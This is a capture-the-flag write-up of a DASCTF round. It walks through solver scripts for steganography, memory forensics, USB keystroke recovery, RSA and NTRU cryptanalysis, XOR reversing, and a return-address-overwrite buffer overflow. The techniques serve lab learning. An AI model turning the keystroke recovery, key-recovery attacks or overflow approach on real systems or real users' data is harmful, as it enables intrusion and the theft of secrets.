Another year, another round played (played), and everyone was so strong (...)
MISC
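MISC-Sign-in
Dropped it into stegsolve: switching channels and scanning the QR code gives the first half of the flag, LSB gives the second half; they are encoded in Brainfuck and Ook! respectively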
https://www.splitbrain.org/services/ook
MISC-BitMap
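Dropped it into 010 Editor and ran the BMP template; bam, bfSize and bfOffBits are right there
bfSize: 1080056 # 1080054 is not a multiple of 4, so two 00 bytes have to be appended to the end of the file
bfOffBits: 54 # the highlighted part of the template is clearly 16*3+6=54
Also, biBitCount is 32, so
(width*height)*(32/8)+54+2=1080056 # (width*height)*(bytes per pixel)+file header+padding appended at the end of the file=file size
which gives width*height=270000. Since the biHeight value already gives a hint (-300), h=300, w=900.
Following the "blue green red and what" hint in the recovered image, extract the rgbReserved bit of every pixel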
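import matplotlib.pyplot as plt
import numpy as np
with open('BitMap.bmp','rb') as f:
    data=f.read()
# Pixel data starts at 0x36 (bfOffBits=54); each pixel is B,G,R,rgbReserved,
# so the rgbReserved byte of pixel i sits at 0x39+4*i.
res=np.array([data[0x39+4*i]&1 for i in range(1080000//4)]).reshape(300,900)
plt.imshow(res, cmap='gray')
plt.savefig("res.png")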
Base32-decoding the text in the new image gives the flag
IRAVGQ2UIZ5TAMBXMJSDIOJRHEYTKMRXG5STEMTEGIYDKZDFMU2DEOLGGQZDIYL5
# DASCTF{007bd491915277e22d205dee429f424a}
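The header arithmetic and the rgbReserved extraction above, as an added example (not the author's script): it derives the width from the file size when biWidth cannot be trusted, then reads bit 0 of the fourth byte of each pixel. The sample BMP is constructed in the code, the function names are hypothetical, and only 32-bit pixels with a 40-byte info header are handled.

```python
import struct

def width_from_size(file_size, off_bits, bit_count, height):
    """Solve (width*height)*(bit_count/8) + off_bits + padding = file_size for width."""
    if bit_count != 32:
        raise ValueError("only 32-bit pixels: their rows need no per-row padding")
    row_unit = abs(height) * (bit_count // 8)
    if row_unit == 0:
        raise ValueError("height is zero, width cannot be derived")
    # Integer division drops the trailing pad bytes (2 in the challenge file).
    return (file_size - off_bits) // row_unit

def read_headers(raw):
    """Return (bfOffBits, biBitCount, |biHeight|) from a BMP with a 40-byte info header."""
    magic, _bf_size, _r1, _r2, off_bits = struct.unpack_from("<2sIHHI", raw, 0)
    if magic != b"BM":
        raise ValueError("not a BMP file")
    _bi_size, _bi_width, bi_height, _planes, bit_count = struct.unpack_from("<IiiHH", raw, 14)
    return off_bits, bit_count, abs(bi_height)   # negative biHeight = top-down rows

def reserved_lsb_rows(raw):
    """Rebuild the width, then collect bit 0 of rgbReserved (4th byte of each pixel)."""
    off_bits, bit_count, height = read_headers(raw)
    width = width_from_size(len(raw), off_bits, bit_count, height)
    rows = []
    for y in range(height):
        base = off_bits + 4 * y * width
        rows.append([raw[base + 4 * x + 3] & 1 for x in range(width)])
    return width, rows

def build_sample(bits, height):
    """Constructed test file: biWidth zeroed, payload in rgbReserved, 2 pad bytes at the end."""
    pixels = b"".join(bytes([0x10, 0x20, 0x30, 0xFE | b]) for b in bits)
    info = struct.pack("<IiiHHIIiiII", 40, 0, -height, 1, 32, 0, len(pixels), 0, 0, 0, 0)
    size = 14 + len(info) + len(pixels) + 2
    head = struct.pack("<2sIHHI", b"BM", size, 0, 0, 14 + len(info))
    return head + info + pixels + b"\x00\x00"

SAMPLE_BITS = [1, 0, 1, 1, 0, 0,
               0, 1, 0, 0, 1, 1]          # constructed 6x2 payload
SAMPLE = build_sample(SAMPLE_BITS, 2)

if __name__ == "__main__":
    print(width_from_size(1080056, 54, 32, -300))   # numbers from the write-up
    print(reserved_lsb_rows(SAMPLE))
```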
MISC-Lost File
First, go all in with volatility
$ py -2 vol.py -f WIN-BU6IJ7FI9RU-20190927-163703.raw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
Then scan for files; quick, and feeling very confident
$ py -2 vol.py -f WIN-BU6IJ7FI9RU-20190927-163703.raw --profile=Win7SP1x86_23418 filescan
Volatility Foundation Volatility Framework 2.6.1
……
0x000000003e4ca2f8 2 0 -W-rwd \Device\HarddiskVolume1\Users\CTF\Desktop\DumpIt\serect.zip-CTF\VMwareDnD\28cb21dd\serect.zip
……
secret, so of course I dump it out and take a look
$ py -2 vol.py -f WIN-BU6IJ7FI9RU-20190927-163703.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003e4ca2f8 -D .\
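The archive needs a password to extract; brute-forcing and hunting for the password got nowhere, so I slowly crawled away (
...After hearing the walkthrough: you're supposed to look at the clipboard. Who would ever think of that! Thanks a lot, really (angry)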
$ py -2 vol.py -f WIN-BU6IJ7FI9RU-20190927-163703.raw --profile=Win7SP1x86_23418 clipboard
Extract to get the flag
MISC-USB Traffic Analysis
First, run tshark
tshark -r keyboard.pcap -T fields -e usb.capdata > usbdata1.txt
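Then run a script and tidy up the output (an update after four years; I hereby name it the keyboard super invincible supreme deluxe golden DX edition)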
normalKeys = {
"04":"a",
"05":"b",
"06":"c",
"07":"d",
"08":"e",
"09":"f",
"0a":"g",
"0b":"h",
"0c":"i",
"0d":"j",
"0e":"k",
"0f":"l",
"10":"m",
"11":"n",
"12":"o",
"13":"p",
"14":"q",
"15":"r",
"16":"s",
"17":"t",
"18":"u",
"19":"v",
"1a":"w",
"1b":"x",
"1c":"y",
"1d":"z",
"1e":"1",
"1f":"2",
"20":"3",
"21":"4",
"22":"5",
"23":"6",
"24":"7",
"25":"8",
"26":"9",
"27":"0",
"28":"<RET>",
"29":"<ESC>",
"2a":"<DEL>",
"2b":"\t",
"2c":"<SPACE>",
"2d":"-",
"2e":"=",
"2f":"[",
"30":"]",
"31":"\\",
"32":"<NON>",
"33":";",
"34":"'",
"35":"<GA>",
"36":",",
"37":".",
"38":"/",
"39":"<CAP>",
"3a":"<F1>",
"3b":"<F2>",
"3c":"<F3>",
"3d":"<F4>",
"3e":"<F5>",
"3f":"<F6>",
"40":"<F7>",
"41":"<F8>",
"42":"<F9>",
"43":"<F10>",
"44":"<F11>",
"45":"<F12>",
"46":"<PrintScreen>",
"47":"<Scroll Lock>",
"48":"<Pause>",
"49":"<Insert>",
"4a":"<Home>",
"4b":"<PageUp>",
"4c":"<Delete Forward>",
"4d":"<End>",
"4e":"<PageDown>",
"4f":"<RightArrow>",
"50":"<LeftArrow>",
"51":"<DownArrow>",
"52":"<UpArrow>",
"53":"<Num Lock and Clear>",
"54":"/",
"55":"*",
"56":"-",
"57":"+",
"58":"<ENTER>",
"59":"1",
"5a":"2",
"5b":"3",
"5c":"4",
"5d":"5",
"5e":"6",
"5f":"7",
"60":"8",
"61":"9",
"62":"0",
"63":".",
"64":"\\",
"65":"<Application>",
"66":"<Power>",
"67":"=",
"68":"<F13>",
"69":"<F14>",
"6a":"<F15>",
"6b":"<F16>",
"6c":"<F17>",
"6d":"<F18>",
"6e":"<F19>",
"6f":"<F20>",
"70":"<F21>",
"71":"<F22>",
"72":"<F23>",
"73":"<F24>",
"74":"<Execute>",
"75":"<Help>",
"76":"<Menu>",
"77":"<Select>",
"78":"<Stop>",
"79":"<Again>",
"7a":"<Undo>",
"7b":"<Cut>",
"7c":"<Copy>",
"7d":"<Paste>",
"7e":"<Find>",
"7f":"<Mute>",
"80":"<Volume Up>",
"81":"<Volume Down>",
"82":"<Locking Caps Lock>",
"83":"<Locking Num Lock>",
"84":"<Locking Scroll Lock>",
"85":"<Comma>",
"86":"<Equal Sign>",
"87":"<International1>",
"88":"<International2>",
"89":"<International3>",
"8a":"<International4>",
"8b":"<International5>",
"8c":"<International6>",
"8d":"<International7>",
"8e":"<International8>",
"8f":"<International9>",
"90":"<LANG1>",
"91":"<LANG2>",
"92":"<LANG3>",
"93":"<LANG4>",
"94":"<LANG5>",
"95":"<LANG6>",
"96":"<LANG7>",
"97":"<LANG8>",
"98":"<LANG9>",
"99":"<Alternate Erase>",
"9a":"<SysReq/Attention>",
"9b":"<Cancel>",
"9c":"<Clear>",
"9d":"<Prior>",
"9e":"<Return>",
"9f":"<Separator>",
"a0":"<Out>",
"a1":"<Oper>",
"a2":"<Clear/Again>",
"a3":"<CrSel/Props>",
"a4":"<ExSel>",
"a5":"<Reserved>",
"a6":"<Reserved>",
"a7":"<Reserved>",
"a8":"<Reserved>",
"a9":"<Reserved>",
"aa":"<Reserved>",
"ab":"<Reserved>",
"ac":"<Reserved>",
"ad":"<Reserved>",
"ae":"<Reserved>",
"af":"<Reserved>",
"b0":"<00>",
"b1":"<000>",
"b2":"<Thousands Separator>",
"b3":"<Decimal Separator>",
"b4":"<Currency Unit>",
"b5":"<Currency Sub-unit>",
"b6":"(",
"b7":")",
"b8":"{",
"b9":"}",
"ba":"<Tab>",
"bb":"<Backspace>",
"bc":"A",
"bd":"B",
"be":"C",
"bf":"D",
"c0":"E",
"c1":"F",
"c2":"<XOR>",
"c3":"^",
"c4":"%",
"c5":"<",
"c6":">",
"c7":"&",
"c8":"&&",
"c9":"|",
"ca":"||",
"cb":":",
"cc":"#",
"cd":"<Space>",
"ce":"@",
"cf":"!",
"d0":"<Memory Store>",
"d1":"<Memory Recall>",
"d2":"<Memory Clear>",
"d3":"<Memory Add>",
"d4":"<Memory Subtract>",
"d5":"<Memory Multiply>",
"d6":"<Memory Divide>",
"d7":"<+/->",
"d8":"<Clear>",
"d9":"<Clear Entry>",
"da":"<Binary>",
"db":"<Octal>",
"dc":"<Decimal>",
"dd":"<Hexadecimal>",
"de":"<Reserved>",
"df":"<Reserved>",
"e0":"<Left Control>",
"e1":"<Left Shift>",
"e2":"<Left Alt>",
"e3":"<Left GUI>",
"e4":"<Right Control>",
"e5":"<Right Shift>",
"e6":"<Right Alt>",
"e7":"<Right GUI>",
}
shiftKeys = {
"04":"A",
"05":"B",
"06":"C",
"07":"D",
"08":"E",
"09":"F",
"0a":"G",
"0b":"H",
"0c":"I",
"0d":"J",
"0e":"K",
"0f":"L",
"10":"M",
"11":"N",
"12":"O",
"13":"P",
"14":"Q",
"15":"R",
"16":"S",
"17":"T",
"18":"U",
"19":"V",
"1a":"W",
"1b":"X",
"1c":"Y",
"1d":"Z",
"1e":"!",
"1f":"@",
"20":"#",
"21":"$",
"22":"%",
"23":"^",
"24":"&",
"25":"*",
"26":"(",
"27":")",
"28":"<RET>",
"29":"<ESC>",
"2a":"<DEL>",
"2b":"\t",
"2c":"<SPACE>",
"2d":"_",
"2e":"+",
"2f":"{",
"30":"}",
"31":"|",
"32":"<NON>",
"33":"\"",
"34":":",
"35":"<GA>",
"36":"<",
"37":">",
"38":"?",
"39":"<CAP>",
"3a":"<F1>",
"3b":"<F2>",
"3c":"<F3>",
"3d":"<F4>",
"3e":"<F5>",
"3f":"<F6>",
"40":"<F7>",
"41":"<F8>",
"42":"<F9>",
"43":"<F10>",
"44":"<F11>",
"45":"<F12>",
"46":"<PrintScreen>",
"47":"<Scroll Lock>",
"48":"<Pause>",
"49":"<Insert>",
"4a":"<Home>",
"4b":"<PageUp>",
"4c":"<Delete Forward>",
"4d":"<End>",
"4e":"<PageDown>",
"4f":"<RightArrow>",
"50":"<LeftArrow>",
"51":"<DownArrow>",
"52":"<UpArrow>",
"53":"<Num Lock and Clear>",
"54":"/",
"55":"*",
"56":"-",
"57":"+",
"58":"<ENTER>",
"59":"1",
"5a":"2",
"5b":"3",
"5c":"4",
"5d":"5",
"5e":"6",
"5f":"7",
"60":"8",
"61":"9",
"62":"0",
"63":".",
"64":"\\",
"65":"<Application>",
"66":"<Power>",
"67":"=",
"68":"<F13>",
"69":"<F14>",
"6a":"<F15>",
"6b":"<F16>",
"6c":"<F17>",
"6d":"<F18>",
"6e":"<F19>",
"6f":"<F20>",
"70":"<F21>",
"71":"<F22>",
"72":"<F23>",
"73":"<F24>",
"74":"<Execute>",
"75":"<Help>",
"76":"<Menu>",
"77":"<Select>",
"78":"<Stop>",
"79":"<Again>",
"7a":"<Undo>",
"7b":"<Cut>",
"7c":"<Copy>",
"7d":"<Paste>",
"7e":"<Find>",
"7f":"<Mute>",
"80":"<Volume Up>",
"81":"<Volume Down>",
"82":"<Locking Caps Lock>",
"83":"<Locking Num Lock>",
"84":"<Locking Scroll Lock>",
"85":"<Comma>",
"86":"<Equal Sign>",
"87":"<International1>",
"88":"<International2>",
"89":"<International3>",
"8a":"<International4>",
"8b":"<International5>",
"8c":"<International6>",
"8d":"<International7>",
"8e":"<International8>",
"8f":"<International9>",
"90":"<LANG1>",
"91":"<LANG2>",
"92":"<LANG3>",
"93":"<LANG4>",
"94":"<LANG5>",
"95":"<LANG6>",
"96":"<LANG7>",
"97":"<LANG8>",
"98":"<LANG9>",
"99":"<Alternate Erase>",
"9a":"<SysReq/Attention>",
"9b":"<Cancel>",
"9c":"<Clear>",
"9d":"<Prior>",
"9e":"<Return>",
"9f":"<Separator>",
"a0":"<Out>",
"a1":"<Oper>",
"a2":"<Clear/Again>",
"a3":"<CrSel/Props>",
"a4":"<ExSel>",
"a5":"<Reserved>",
"a6":"<Reserved>",
"a7":"<Reserved>",
"a8":"<Reserved>",
"a9":"<Reserved>",
"aa":"<Reserved>",
"ab":"<Reserved>",
"ac":"<Reserved>",
"ad":"<Reserved>",
"ae":"<Reserved>",
"af":"<Reserved>",
"b0":"<00>",
"b1":"<000>",
"b2":"<Thousands Separator>",
"b3":"<Decimal Separator>",
"b4":"<Currency Unit>",
"b5":"<Currency Sub-unit>",
"b6":"(",
"b7":")",
"b8":"{",
"b9":"}",
"ba":"<Tab>",
"bb":"<Backspace>",
"bc":"A",
"bd":"B",
"be":"C",
"bf":"D",
"c0":"E",
"c1":"F",
"c2":"<XOR>",
"c3":"^",
"c4":"%",
"c5":"<",
"c6":">",
"c7":"&",
"c8":"&&",
"c9":"|",
"ca":"||",
"cb":":",
"cc":"#",
"cd":"<Space>",
"ce":"@",
"cf":"!",
"d0":"<Memory Store>",
"d1":"<Memory Recall>",
"d2":"<Memory Clear>",
"d3":"<Memory Add>",
"d4":"<Memory Subtract>",
"d5":"<Memory Multiply>",
"d6":"<Memory Divide>",
"d7":"<+/->",
"d8":"<Clear>",
"d9":"<Clear Entry>",
"da":"<Binary>",
"db":"<Octal>",
"dc":"<Decimal>",
"dd":"<Hexadecimal>",
"de":"<Reserved>",
"df":"<Reserved>",
"e0":"<Left Control>",
"e1":"<Left Shift>",
"e2":"<Left Alt>",
"e3":"<Left GUI>",
"e4":"<Right Control>",
"e5":"<Right Shift>",
"e6":"<Right Alt>",
"e7":"<Right GUI>",
}
output = []
with open('usbdata1.txt','r') as keys:
    for line in keys:
        try:
            # turn "0002000400000000" into "00:02:00:04:..." so the fixed offsets below apply
            for i in range(0,len(line) + len(line)//2,3):
                line = line[:i+2] + ':' + line[i+2:]
            # keep only reports with modifier 00 or 02 (shift), one pressed key and nothing else set
            if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
                continue
            if line[6:8] in normalKeys.keys():
                # pick the shifted table when the modifier byte is 02
                output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
            else:
                output += ['[unknown]']
        except:
            pass
flag=0
print("".join(output))
# apply <DEL>: drop the marker and the key typed before it
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        if a!=0:
            del output[a-1]
    except:
        pass
# apply <CAP>: upper-case everything between a pair of Caps Lock presses
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print ('output :' + "".join(output).replace('<RET>','\n').replace('<SPACE>',' '))
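Take the MD5 of the result to get the flag
MISC-Really Happy
Didn't expect the dumb script I wrote three years ago could be reused (...). It's slow, but I'm too lazy to write a DL version, so I crawl on
Repository: recognizing simple image CAPTCHAs with kNN
Made a few adaptations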
boxs = [(0, 0, 50, 50),(50, 0, 100, 50), (100, 0, 150, 50), (150, 0, 200, 50)]
Since the images in the test folder begin and end with FFD8 and FFD9, writing the recognition results into a jpg gives the flag
a=bytes.fromhex(''.join(res))
with open('res.jpg','wb')as f:
    f.write(a)
# flag{2ce3232456e2c7ff11de771f9ca5aff7}
CRYPTO
CRYPTO-Sign-in
Dropped it into CyberChef, base64-decoded it, then swapped characters and tried things slowly (...) crawling on
# DASCTF{78ada113e709fdf12a5aa4aa5dd62e33}
CRYPTO-Second Sign-in
Crypto folks, please stop playing with custom-alphabet base64!! (
CRYPTO-RSA1
Given c1, d1 and n, m1=pow(c1,d1,n) follows directly.
From n, e1 and d1 we can recover p and q, which gives phi=(p-1)*(q-1); then with d2=gmpy2.invert(e2,phi), m2=pow(c2,d2,n) follows directly.
# from Crypto.Util.number import *
# import gmpy2
# msg1 = '**********************************'
# msg2 = '**********************************'
# hex_msg1=int(msg1.encode("hex"),16)
# hex_msg2=int(msg2.encode("hex"),16)
# p=getPrime(512)
# q=getPrime(512)
# n1=p*q
# e1=0x10001
# e2=getPrime(10)
# n2=n1
# c1=pow(hex_msg1,e1,n1)
# c2=pow(hex_msg2,e2,n2)
# phi=(p-1)*(q-1)
# d1=gmpy2.invert(e1,phi)
# print("d1=",hex(d1),"e1=",hex(e1),"n1=",hex(n1),"c1=",hex(c1))
# '''
# ('d1=', '0x7d12e57b1aa157038ebe5c45b56256270671e6984b0dcdf10a2ea07ce480143240c9a3e1c60870e499306a717073f157476aa88e99a7bdf1e2a4adf8ce21025cc6c05035c4a1d7e3b6f061464872e65118384999f0154f3c1761fa68d4685126b7fc98f4c2cdc41c98aa4e099a868a89099dd2170664647efca2c8d8e06a2e49',
# 'e1=', '0x10001',
# 'n1=', '0x96ed2727e4446e26c84552a9a19640c7d720c9b6e661cfcfec03463e92a9d0b228ddc9847c0daa137a19db67294626c535fe71c388f6ea3eb8cb5dbf09a84374eb021c9297a29394cf77da157c1b8be77b09a4fcbe54bf3dc93d33539e842766ad8e38369093ddc034ac32583a48e299a4d8b31b606b1729298ee136664b8b77L',
# 'c1=', '0x6c435db37217bc4da3f225a8f1a0501e03a97d2cbc4fa249df051ed66c1559b68885f4fa181bdd9e98242441f463dbbc1c26d1eea2c5774a0a905b366c8775bce8e52182dc32a93647c9b8842b74abc434e5b84eeae679a3b19cb7a1ef6ae8f65d22ce6ab438a16119805eee83408a68207bbdfde5181a8bd8b4794c711d33c4L')
# '''
# print("e2=",hex(e2),"n2=",hex(n2),"c2=",hex(c2))
# '''
# ('e2=', '0x3f1',
# 'n2=', '0x96ed2727e4446e26c84552a9a19640c7d720c9b6e661cfcfec03463e92a9d0b228ddc9847c0daa137a19db67294626c535fe71c388f6ea3eb8cb5dbf09a84374eb021c9297a29394cf77da157c1b8be77b09a4fcbe54bf3dc93d33539e842766ad8e38369093ddc034ac32583a48e299a4d8b31b606b1729298ee136664b8b77L',
# 'c2=', '0x8cb5d8861e5838f41910d6eaf142a8d47b92e0c6b1b1e9e25896f7169644bbb726ccfdc82ba50932fbc45f00c53dda42f8efc358a5108cde8aaa9f38b493aa3417c9522924f06847ba4a3dd26f005a610f7633877fbe89e090df5cb3a7a5ebae0fbe72eabb339b21fa2ddd33844a5cb53e39491fc472721ed676ae07b33c8d6eL')
# '''
import gmpy2
import random
import libnum
def getPQ(n,e,d):
    # factor n from a known (e, d) pair: write e*d-1 = 2^t * r with r odd
    k = e * d - 1
    r = k
    t = 0
    while True:
        r = r // 2
        t += 1
        if r % 2 == 1:
            break
    success = False
    for i in range(1, 101):
        g = random.randint(0, n)
        y = pow(g, r, n)
        if y == 1 or y == n - 1:
            continue
        # square repeatedly, looking for a non-trivial square root of 1 mod n
        for j in range(1, t):
            x = pow(y, 2, n)
            if x == 1:
                success = True
                break
            elif x == n - 1:
                continue
            else:
                y = x
        if success:
            break
        else:
            continue
    if success:
        p = libnum.gcd(y - 1, n)
        q = n // p
        return p,q
    else:
        raise ValueError('Cannot compute P and Q')
e1=0x10001
e2=0x3f1
d1=0x7d12e57b1aa157038ebe5c45b56256270671e6984b0dcdf10a2ea07ce480143240c9a3e1c60870e499306a717073f157476aa88e99a7bdf1e2a4adf8ce21025cc6c05035c4a1d7e3b6f061464872e65118384999f0154f3c1761fa68d4685126b7fc98f4c2cdc41c98aa4e099a868a89099dd2170664647efca2c8d8e06a2e49
n=0x96ed2727e4446e26c84552a9a19640c7d720c9b6e661cfcfec03463e92a9d0b228ddc9847c0daa137a19db67294626c535fe71c388f6ea3eb8cb5dbf09a84374eb021c9297a29394cf77da157c1b8be77b09a4fcbe54bf3dc93d33539e842766ad8e38369093ddc034ac32583a48e299a4d8b31b606b1729298ee136664b8b77
c1=0x6c435db37217bc4da3f225a8f1a0501e03a97d2cbc4fa249df051ed66c1559b68885f4fa181bdd9e98242441f463dbbc1c26d1eea2c5774a0a905b366c8775bce8e52182dc32a93647c9b8842b74abc434e5b84eeae679a3b19cb7a1ef6ae8f65d22ce6ab438a16119805eee83408a68207bbdfde5181a8bd8b4794c711d33c4
c2=0x8cb5d8861e5838f41910d6eaf142a8d47b92e0c6b1b1e9e25896f7169644bbb726ccfdc82ba50932fbc45f00c53dda42f8efc358a5108cde8aaa9f38b493aa3417c9522924f06847ba4a3dd26f005a610f7633877fbe89e090df5cb3a7a5ebae0fbe72eabb339b21fa2ddd33844a5cb53e39491fc472721ed676ae07b33c8d6e
p,q=getPQ(n,e1,d1)
print('m1:',libnum.n2s(pow(c1,d1,n)))
d2=int(gmpy2.invert(e2,(p-1)*(q-1)))
print('m2:',libnum.n2s(pow(c2,d2,n)))
# flag part one is :2295b774c4467c9a
# flag part two is :ca5c600783b9bde0
CRYPTO-RSA2
e3 is visibly huge right from the start, so go for a Wiener attack
import gmpy2
from Crypto.PublicKey import RSA
import ContinuedFractions, Arithmetic
from Crypto.Util.number import long_to_bytes
def wiener_hack(e, n):
    # firstly git clone https://github.com/pablocelayes/rsa-wiener-attack.git !
    frac = ContinuedFractions.rational_to_contfrac(e, n)
    convergents = ContinuedFractions.convergents_from_contfrac(frac)
    for (k, d) in convergents:
        if k != 0 and (e * d - 1) % k == 0:
            phi = (e * d - 1) // k
            s = n - phi + 1
            discr = s * s - 4 * n
            if (discr >= 0):
                t = Arithmetic.is_perfect_square(discr)
                if t != -1 and (s + t) % 2 == 0:
                    print("Hacked!")
                    return d,phi
    return False
def main():
    e=663164990242540553660820123984958362292767589050706562525585149518469420039430050814053460276242420171688628686731721858712475428243746423919061950258579075115696969767529903377571203001499079349600716341343846020128095111908915240158242174010840342112170003771807591457926458807775028482732501
    n=0x5bf7c98078ceec04b8c414c65731926712d48f6852c4d7a5dfeac5344d3f02d42dc8e387eb7e731c7efb233464279811228fb4bf96dbefe753c7b5a1850cbaa4d7f1048b5d3a2a7a0d3092fd8e4be0f8e298dfc57a38604c225760446816174be08ba1bcb7eaf594126961d5feab6de678a67e1100734d2edd76d6e3778c21e7
    c=0xcfd6983f1856b0fb6dc851d56ddcbfe66e03acb5ff568f6cd2c07f08448e09b5c513f76e939f4cf3d6f8b0950027c1a31ab6ae27d52ce0bb4b2c3d6502a8bd0e167471b1ee03e645b0aca8e2a93f4b1a8a9e3e493fc811e4104160a11494c548f21508559b508a6ef9a20df7e418fae6f33d14899419330ab29fed26712623b
    d,phi = wiener_hack(e, n)
    m = pow(c,d,n)
    print ('m:',m)
    print ('phi:',phi)
if __name__=="__main__":
    main()
Given phi, e1, e2 and e3, d1, d2 and d3 are easy to compute, and m is then obtained with pow(c,d,n).
# from Crypto.Util.number import *
# import binascii
# flag = '*****************************************'
# hex_flag=int(flag.encode("hex"),16)
# p=getPrime(512)
# q=getPrime(512)
# n=p*q
# e1=1376213
# e2=11932523
# e3=663164990242540553660820123984958362292767589050706562525585149518469420039430050814053460276242420171688628686731721858712475428243746423919061950258579075115696969767529903377571203001499079349600716341343846020128095111908915240158242174010840342112170003771807591457926458807775028482732501
# c=pow(pow(pow(hex_flag,e1,n),e2,n),e3,n)
# print("n=",hex(n),"c=",hex(c))
# '''
# ('n=', '0x5bf7c98078ceec04b8c414c65731926712d48f6852c4d7a5dfeac5344d3f02d42dc8e387eb7e731c7efb233464279811228fb4bf96dbefe753c7b5a1850cbaa4d7f1048b5d3a2a7a0d3092fd8e4be0f8e298dfc57a38604c225760446816174be08ba1bcb7eaf594126961d5feab6de678a67e1100734d2edd76d6e3778c21e7L',
# 'c=', '0xcfd6983f1856b0fb6dc851d56ddcbfe66e03acb5ff568f6cd2c07f08448e09b5c513f76e939f4cf3d6f8b0950027c1a31ab6ae27d52ce0bb4b2c3d6502a8bd0e167471b1ee03e645b0aca8e2a93f4b1a8a9e3e493fc811e4104160a11494c548f21508559b508a6ef9a20df7e418fae6f33d14899419330ab29fed26712623bL')
# '''
import gmpy2
import libnum
e1=1376213
e2=11932523
e3=663164990242540553660820123984958362292767589050706562525585149518469420039430050814053460276242420171688628686731721858712475428243746423919061950258579075115696969767529903377571203001499079349600716341343846020128095111908915240158242174010840342112170003771807591457926458807775028482732501
n=0x5bf7c98078ceec04b8c414c65731926712d48f6852c4d7a5dfeac5344d3f02d42dc8e387eb7e731c7efb233464279811228fb4bf96dbefe753c7b5a1850cbaa4d7f1048b5d3a2a7a0d3092fd8e4be0f8e298dfc57a38604c225760446816174be08ba1bcb7eaf594126961d5feab6de678a67e1100734d2edd76d6e3778c21e7
c=0xcfd6983f1856b0fb6dc851d56ddcbfe66e03acb5ff568f6cd2c07f08448e09b5c513f76e939f4cf3d6f8b0950027c1a31ab6ae27d52ce0bb4b2c3d6502a8bd0e167471b1ee03e645b0aca8e2a93f4b1a8a9e3e493fc811e4104160a11494c548f21508559b508a6ef9a20df7e418fae6f33d14899419330ab29fed26712623b
phi=64582068585400449854559773856215586254049871459934003885750881374390571949374960163831675283683435709342851751288865205417000272068038325969529608823713220090902209877602831251682355563845220513839652694871841465226375450915279218288554946739972407042319969761474571579122273434180473292075635457572207186384
d1=gmpy2.invert(e3,phi)
d2=gmpy2.invert(e2,phi)
d3=gmpy2.invert(e1,phi)
print(libnum.n2s(int(pow(pow(pow(c,d1,n),d2,n),d3,n))))
# flag is :78cc56ba4450a697fd625cc91ddf4432
CRYPTO-NTRU
Challenge:
from random import randrange
from Crypto.Util.number import *
from gmpy2 import invert
def gcd(a,b):
    while b:
        a,b = b,a%b
    return a
def generate():
    p = getPrime(1024)
    while True:
        f = randrange(1,(p//2)**(0.5))
        g = randrange((p//4)**(0.5),(p//2)**(0.5))
        if gcd(f,p)==1 and gcd(f,g)==1:
            break
    h = (invert(f,p)*g)%p
    return h,p,f,g
def encrypt(m,h,p):
    assert m<(p//4)**(0.5)
    r = randrange(1,(p//2)**(0.5))
    c = (r*h+m)%p
    return c
h,p,f,g = generate()
from flag import flag
c = encrypt(bytes_to_long(flag),h,p)
print("h = {}".format(h))
print("p = {}".format(p))
print("c = {}".format(c))
Copied it (copied it); reference:
# sage (https://sagecell.sagemath.org/)
h = 70851272226599856513658616506718804769182611213413854493145253337330709939355936692154199813179587933065165812259913249917314725765898812249062834111179900151466610356207921771928832591335738750053453046857602342378475278876652263044722419918958361163645152112020971804267503129035439011008349349624213734004
p = 125796773654949906956757901514929172896506715196511121353157781851652093811702246079116208920427110231653664239838444378725001877052652056537732732266407477191221775698956008368755461680533430353707546171814962217736494341129233572423073286387554056407408816555382448824610216634458550949715062229816683685469
c = 4691517945653877981376957637565364382959972087952249273292897076221178958350355396910942555879426136128610896883898318646711419768716904972164508407035668258209226498292327845169861395205212789741065517685193351416871631112431257858097798333893494180621728198734264288028849543413123321402664789239712408700
# Construct lattice.
v1 = vector(ZZ, [1, h])
v2 = vector(ZZ, [0, p])
m = matrix([v1,v2]);
# Solve SVP.
shortest_vector = m.LLL()[0]
f, g = shortest_vector
if f < 0 and g < 0:
    g *= -1
    f *= -1
print(f, g)
# Decrypt.
a = f*c % p % g
m = a * inverse_mod(f, g) % g
print(bytes.fromhex(hex(m)[2:]))
# flag{93d02e3bf2c7458a47aac58387140dd5}
RE-cathex
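Drag it into IDA; F5 gives:
RE-easyrere
Another all-in F5
RE-Clear Logic
Yet another F5. Why are the RE challenges this easy? I hate myself for not grabbing RE first blood first...
One should not pour a finite life into infinite RSA (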
v13=[1]*32
v13[0] = 77
v13[1] = 127
v13[2] = 112
v13[3] = 70
v13[4] = 74
v13[5] = 33
v13[6] = 44
v13[7] = 23
v13[8] = 73
v13[9] = 34
v13[10] = 45
v13[11] = 72
v13[12] = 19
v13[13] = 39
v13[14] = 112
v13[15] = 70
v13[16] = 19
v13[17] = 115
v13[18] = 36
v13[19] = 70
v13[20] = 17
v13[21] = 36
v13[22] = 116
v13[23] = 17
v13[24] = 69
v13[25] = 127
v13[26] = 120
v13[27] = 23
v13[28] = 30
v13[29] = 113
v13[30] = 46
v13[31] = 18
v9 = 122
v12=['']*32
# for i in range(0,32):
#     for j in range(0,i):
#         v9 ^= v12[j]
#     v9 ^ v12[i] == v13[i]
for i in range(0,32):
    for j in range(0,i):
        v9 ^= v12[j]
    v12[i]=v13[i]^v9
print(''.join([chr(i)for i in v12]))
PWN
PWN-magicc
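Post-contest review desu.
IDA as usual; find the key function
ssize_t Slytherin()
{
  char buf[18]; // [esp+16h] [ebp-12h] BYREF
  puts("Here you can learn Avada Kedavra");
  puts("You are one step short of success");
  return read(0, buf, 0x28u);
}
int hgdjskhrtdiu()
{
  return system("cat flag");
}
The distance from buf to r is 0x12+0x4.
The s at +00000000 holds the previous ebp value, used to restore the previous function's frame; the r at +00000004 is this function's return address. Overwriting the return address r with the address of the function we want is enough to hijack the program, so that once Slytherin finishes it runs the function we want.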
